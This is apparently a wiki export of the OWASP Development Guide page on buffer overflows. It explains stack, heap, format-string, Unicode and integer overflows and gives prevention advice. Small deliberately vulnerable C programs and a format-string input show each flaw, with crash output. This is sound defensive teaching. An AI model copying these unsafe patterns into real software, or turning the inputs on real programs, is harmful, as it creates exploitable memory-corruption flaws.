&lt;br /&gt;
* Non-executable stacks – many operating systems have at least some support for this&lt;br /&gt;
&lt;br /&gt;
* Compiler tools – StackShield, StackGuard, and Libsafe, among others&lt;br /&gt;
&lt;br /&gt;
* Safe functions – use strncat instead of strcat, strncpy instead of strcpy, etc&lt;br /&gt;
&lt;br /&gt;
* Patches – Be sure to keep your web and application servers fully patched, and be aware of bug reports relating to applications upon which your code is dependent.&lt;br /&gt;
&lt;br /&gt;
* Periodically scan your application with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. &lt;br /&gt;
&lt;br /&gt;
==Stack Overflow ==&lt;br /&gt;
&lt;br /&gt;
Stack overflows are the best understood and the most common form of buffer overflow. The basics of a stack overflow are simple:&lt;br /&gt;
&lt;br /&gt;
* There are two buffers: a source buffer containing arbitrary input (presumably from the attacker), and a destination buffer that is too small for the attack input. The destination buffer resides on the stack, adjacent to the function return address.&lt;br /&gt;
&lt;br /&gt;
* The faulty code does ''not'' check whether the source data fits in the destination buffer. It copies the attack input to the destination buffer, overwriting adjacent information on the stack (such as the function return address).&lt;br /&gt;
&lt;br /&gt;
* When the function returns, the CPU unwinds the stack frame and pops the (now modified) return address from the stack.&lt;br /&gt;
&lt;br /&gt;
* Control does not return to the function as it should. Instead, arbitrary code (chosen by the attacker when crafting the initial input) is executed. &lt;br /&gt;
&lt;br /&gt;
The following example, written in C, demonstrates a stack overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void f(char* s) {&lt;br /&gt;
    char buffer[10];&lt;br /&gt;
    strcpy(buffer, s);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    f(&amp;quot;01234567890123456789&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./stacktest&lt;br /&gt;
&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values or non-executable stacks to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Heap Overflow ==&lt;br /&gt;
&lt;br /&gt;
Heap overflows are problematic in that they are not necessarily prevented by non-executable stack protections, since the heap is a separate region of memory allocated by the application at run-time to store data. The following example, written in C, shows a heap overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define BSIZE 16&lt;br /&gt;
 #define OVERSIZE 8 /* overflow buf1 by OVERSIZE bytes */&lt;br /&gt;
&lt;br /&gt;
 int main(void) {&lt;br /&gt;
    u_long b_diff;&lt;br /&gt;
    char *buf0 = (char*)malloc(BSIZE);		// create two buffers&lt;br /&gt;
    char *buf1 = (char*)malloc(BSIZE);&lt;br /&gt;
&lt;br /&gt;
    b_diff = (u_long)buf1 - (u_long)buf0;	// difference between locations&lt;br /&gt;
    printf(&amp;quot;Initial values:  &amp;quot;);&lt;br /&gt;
    printf(&amp;quot;buf0=%p, buf1=%p, b_diff=0x%x bytes\n&amp;quot;, buf0, buf1, b_diff);&lt;br /&gt;
&lt;br /&gt;
    memset(buf1, 'A', BSIZE-1), buf1[BSIZE-1] = '\0';&lt;br /&gt;
    printf(&amp;quot;Before overflow: buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
&lt;br /&gt;
    memset(buf0, 'B', (u_int)(b_diff + OVERSIZE));&lt;br /&gt;
    printf(&amp;quot;After overflow:  buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./heaptest&lt;br /&gt;
&lt;br /&gt;
Initial values:  buf0=0x9322008, buf1=0x9322020, b_diff=0x18 bytes&lt;br /&gt;
Before overflow: buf1=AAAAAAAAAAAAAAA&lt;br /&gt;
After overflow:  buf1=BBBBBBBBAAAAAAA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The simple program above shows two buffers being allocated on the heap, with the first buffer being overflowed to overwrite the contents of the second buffer. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language)  that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Format String ==&lt;br /&gt;
&lt;br /&gt;
Format string buffer overflows (usually called &amp;quot;format string vulnerabilities&amp;quot;) are highly specialized buffer overflows that can have the same effects as other buffer overflow attacks. Basically, format string vulnerabilities take advantage of the mixture of data and control information in certain functions, such as C/C++'s printf. The easiest way to understand this class of vulnerability is with an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(void) {&lt;br /&gt;
    char str[100];&lt;br /&gt;
    scanf(&amp;quot;%99s&amp;quot;, str);&lt;br /&gt;
    printf(&amp;quot;%s&amp;quot;, str);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simple program takes input from the user and displays it back on the screen. The string &amp;lt;code&amp;gt;%s&amp;lt;/code&amp;gt; means that the other parameter, str, should be displayed as a string. This example is ''not'' vulnerable to a format string attack, but if one changes the last line, it becomes exploitable:&lt;br /&gt;
&lt;br /&gt;
    printf(str);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To see how, consider the user entering the special input:&lt;br /&gt;
&lt;br /&gt;
''%08x.%08x.%08x.%08x.%08x''&lt;br /&gt;
&lt;br /&gt;
By constructing input as such, the program can be exploited to print the first five entries from the stack.  &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* uses functions such as printf or snprintf, either directly or indirectly through system services (such as syslog) or other libraries, AND&lt;br /&gt;
&lt;br /&gt;
* the use of such functions allows input from the user to contain control information interpreted by the function itself&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. Specifically check for control information (meta-characters like '%')&lt;br /&gt;
# Avoid the use of functions like printf that allow user input to contain control information&lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Unicode Overflow ==&lt;br /&gt;
&lt;br /&gt;
Unicode exploits are somewhat more difficult to execute than typical buffer overflows, as demonstrated in Anley’s 2002 paper, but it is wrong to assume that using Unicode protects you against buffer overflows. Examples of Unicode overflows include Code Red, a devastating worm with an estimated economic cost in the billions of dollars. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* takes Unicode input from a user AND&lt;br /&gt;
&lt;br /&gt;
* fails to sanitize the input AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself  ===&lt;br /&gt;
&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Integer Overflow ==&lt;br /&gt;
&lt;br /&gt;
When an application takes two numbers of fixed word size and performs an operation on them, the result may not fit within that word size. For example, if the two 8-bit numbers 192 and 208 are added and the sum is stored in another 8-bit value, the result (400) does not fit:&lt;br /&gt;
&lt;br /&gt;
''         1100 0000''&lt;br /&gt;
&lt;br /&gt;
''  +      1101 0000''&lt;br /&gt;
&lt;br /&gt;
''  = 0001 1001 0000''&lt;br /&gt;
&lt;br /&gt;
Although the hardware typically signals such an overflow (for example, by setting a carry or overflow flag), most languages silently discard the high-order bits, so your application must explicitly check for the condition and take proper action. Otherwise, your application would report that 192 + 208 equals 144.&lt;br /&gt;
&lt;br /&gt;
The following code demonstrates an integer overflow that leads to a buffer overflow, and was adapted from [http://www.phrack.org/phrack/60/p60-0x0a.txt Blexim's Phrack article]: [[Category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char *argv[]) {&lt;br /&gt;
    int i = atoi(argv[1]);         // input from user&lt;br /&gt;
    unsigned short s = i;          // truncate to a short&lt;br /&gt;
    char buf[50];                  // large buffer&lt;br /&gt;
&lt;br /&gt;
    if (s &amp;gt; 10) {                  // check we're not greater than 10&lt;br /&gt;
        return;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);       // copy i bytes to the buffer&lt;br /&gt;
    buf[i] = '\0';                 // add a null byte to the buffer&lt;br /&gt;
    printf(&amp;quot;%s\n&amp;quot;, buf);           // output the buffer contents&lt;br /&gt;
&lt;br /&gt;
    return;&lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./inttest 65541 foobar&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code is exploitable because the validation does not occur on the original input value (65541), but rather on that value after it has been truncated to an unsigned short (65541 mod 65536 = 5). The truncated value passes the size check, yet memcpy then copies 65541 bytes into the 50-byte buffer. &lt;br /&gt;
&lt;br /&gt;
Integer overflows can be a problem in any language, and can be exploited when integers are used as array indices or in implicit arithmetic on short types. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Examine use of signed integers, bytes, and shorts.&lt;br /&gt;
&lt;br /&gt;
* Are there cases where these values are used as array indices after performing an arithmetic operation (+, -, *, /, or % (modulo))?&lt;br /&gt;
&lt;br /&gt;
* How would your program react to a negative or zero integer value, particularly during array lookups?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If writing C++, use David LeBlanc’s SafeInt class or a similar construct. Otherwise, use a &amp;quot;BigInteger&amp;quot; or &amp;quot;BigDecimal&amp;quot; implementation in cases where it would be hard to validate input yourself.&lt;br /&gt;
&lt;br /&gt;
* If your compiler supports the option, change the default for integers to be unsigned unless otherwise explicitly stated. Use unsigned integers whenever you don't need negative values.&lt;br /&gt;
&lt;br /&gt;
* Use range checking if your language or framework supports it, or be sure to implement range checking yourself after all arithmetic operations.&lt;br /&gt;
&lt;br /&gt;
* Be sure to check for exceptions if your language supports it.&lt;br /&gt;
&lt;br /&gt;
==Further reading ==&lt;br /&gt;
&lt;br /&gt;
* Team Teso, ''Exploiting Format String Vulnerabilities''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Newsham, Tim, ''Format String Attacks''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.lava.net/~newsham/format-string-attacks.pdf&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* w00 w00 and Matt Conover, ''Preliminary Heap Overflow Tutorial''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Chris Anley, ''Creating Arbitrary Shellcode In Unicode Expanded Strings''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ngssoftware.com/papers/unicodebo.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* David Leblanc, ''Integer Handling with the C++ SafeInt Class ''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure01142004.asp&amp;lt;/u&amp;gt;     &lt;br /&gt;
&lt;br /&gt;
* Aleph One, ''Smashing the Stack for fun and profit''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/49/P49-14&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Mark Donaldson, ''Inside the buffer Overflow Attack: Mechanism, method, &amp;amp; prevention''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://rr.sans.org/code/inside_buffer.php&amp;lt;/u&amp;gt;   [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* ''NX Bit'', Wikipedia article&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://en.wikipedia.org/wiki/NX_bit&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Horizon, ''How to bypass Solaris no execute stack protection''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.secinf.net/unix_security/How_to_bypass_Solaris_nonexecutable_stack_protection_.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Alexander Anisimov, ''Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass'', Positive Technologies&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Blexim, ''Basic Integer Overflows''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/60/p60-0x0a.txt&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* StackShield&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.angelfire.com/sk/stackshield/index.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* StackGuard&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.immunix.org&amp;lt;/u&amp;gt;[[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Libsafe&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.research.avayalabs.com/project/libsafe&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59853</id>
		<title>Buffer Overflows</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59853"/>
				<updated>2009-05-02T11:39:06Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that:&lt;br /&gt;
&lt;br /&gt;
* Applications do not expose themselves to faulty components.&lt;br /&gt;
&lt;br /&gt;
* Applications create as few buffer overflows as possible.&lt;br /&gt;
&lt;br /&gt;
* Developers are encouraged to use languages and frameworks that are relatively immune to buffer overflows.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
Almost every platform, with the following notable exceptions:&lt;br /&gt;
&lt;br /&gt;
* Java/J2EE – as long as native methods or system calls are not invoked.&lt;br /&gt;
&lt;br /&gt;
* .NET – as long as unsafe or unmanaged code is not invoked (such as the use of P/Invoke or COM Interop).&lt;br /&gt;
&lt;br /&gt;
* PHP, Python, Perl – as long as external programs or vulnerable extensions are not used.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity.&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Attackers generally use [[Buffer Overflow|buffer overflows]] to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. &lt;br /&gt;
&lt;br /&gt;
Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks. Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. &lt;br /&gt;
&lt;br /&gt;
Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system.&lt;br /&gt;
&lt;br /&gt;
Buffer overflow attacks generally rely upon two techniques, usually in combination:&lt;br /&gt;
&lt;br /&gt;
* Writing data to particular memory addresses&lt;br /&gt;
&lt;br /&gt;
* Having the operating system mishandle data types&lt;br /&gt;
&lt;br /&gt;
This means that strongly-typed programming languages (and environments) that disallow direct memory access usually prevent buffer overflows from happening.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
|-&lt;br /&gt;
 ! Language/Environment !! Compiled or Interpreted !! Strongly Typed !! Direct Memory Access !! Safe or Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Java, Java Virtual Machine (JVM) || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || .NET || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Perl  || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Python || Interpreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Ruby || Interpreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || C/C++ || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Assembly || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || COBOL || Compiled || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
Table 8.1: Language descriptions&lt;br /&gt;
&lt;br /&gt;
==General Prevention Techniques ==&lt;br /&gt;
&lt;br /&gt;
A number of general techniques to prevent buffer overflows include:&lt;br /&gt;
&lt;br /&gt;
* Code auditing (automated or manual)&lt;br /&gt;
&lt;br /&gt;
* Developer training – bounds checking, use of unsafe functions, and group standards&lt;br /&gt;
&lt;br /&gt;
* Non-executable stacks – many operating systems have at least some support for this&lt;br /&gt;
&lt;br /&gt;
* Compiler tools – StackShield, StackGuard, and Libsafe, among others&lt;br /&gt;
&lt;br /&gt;
* Safe functions – use strncat instead of strcat, strncpy instead of strcpy, etc.&lt;br /&gt;
&lt;br /&gt;
* Patches – Be sure to keep your web and application servers fully patched, and be aware of bug reports relating to applications upon which your code is dependent.&lt;br /&gt;
&lt;br /&gt;
* Periodically scan your application with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. &lt;br /&gt;
&lt;br /&gt;
==Stack Overflow ==&lt;br /&gt;
&lt;br /&gt;
Stack overflows are the best understood and the most common form of buffer overflow. The basic mechanics of a stack overflow are simple:&lt;br /&gt;
&lt;br /&gt;
* There are two buffers: a source buffer containing arbitrary input (presumably from the attacker), and a destination buffer that is too small for the attack input. The destination buffer resides on the stack, close to the function return address.&lt;br /&gt;
&lt;br /&gt;
* The faulty code does ''not'' check whether the source data fits in the destination buffer. It copies the attack input to the destination buffer, overwriting additional information on the stack (such as the function return address).&lt;br /&gt;
&lt;br /&gt;
* When the function returns, the CPU unwinds the stack frame and pops the (now modified) return address from the stack.&lt;br /&gt;
&lt;br /&gt;
* Control does not return to the calling function as it should. Instead, arbitrary code (chosen by the attacker when crafting the initial input) is executed. &lt;br /&gt;
&lt;br /&gt;
The following example, written in C, demonstrates a stack overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void f(char* s) {&lt;br /&gt;
    char buffer[10];&lt;br /&gt;
    strcpy(buffer, s);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int main(void) {&lt;br /&gt;
    f(&amp;quot;01234567890123456789&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./stacktest&lt;br /&gt;
&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values or non-executable stacks to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Heap Overflow ==&lt;br /&gt;
&lt;br /&gt;
Heap overflows are problematic in that they are not necessarily prevented by non-executable stack protections, since the heap is a separate region of memory allocated by the application at run-time to store data. The following example, written in C, shows a heap overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define BSIZE 16&lt;br /&gt;
 #define OVERSIZE 8 /* overflow buf1 by OVERSIZE bytes */&lt;br /&gt;
&lt;br /&gt;
 int main(void) {&lt;br /&gt;
    u_long b_diff;&lt;br /&gt;
    char *buf0 = (char*)malloc(BSIZE);		// create two buffers&lt;br /&gt;
    char *buf1 = (char*)malloc(BSIZE);&lt;br /&gt;
&lt;br /&gt;
    b_diff = (u_long)buf1 - (u_long)buf0;	// difference between locations&lt;br /&gt;
    printf(&amp;quot;Initial values:  &amp;quot;);&lt;br /&gt;
    printf(&amp;quot;buf0=%p, buf1=%p, b_diff=0x%x bytes\n&amp;quot;, buf0, buf1, b_diff);&lt;br /&gt;
&lt;br /&gt;
    memset(buf1, 'A', BSIZE-1), buf1[BSIZE-1] = '\0';&lt;br /&gt;
    printf(&amp;quot;Before overflow: buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
&lt;br /&gt;
    memset(buf0, 'B', (u_int)(b_diff + OVERSIZE));&lt;br /&gt;
    printf(&amp;quot;After overflow:  buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./heaptest&lt;br /&gt;
&lt;br /&gt;
Initial values:  buf0=0x9322008, buf1=0x9322020, b_diff=0x18 bytes&lt;br /&gt;
Before overflow: buf1=AAAAAAAAAAAAAAA&lt;br /&gt;
After overflow:  buf1=BBBBBBBBAAAAAAA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The simple program above shows two buffers being allocated on the heap, with the first buffer being overflowed to overwrite the contents of the second buffer. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
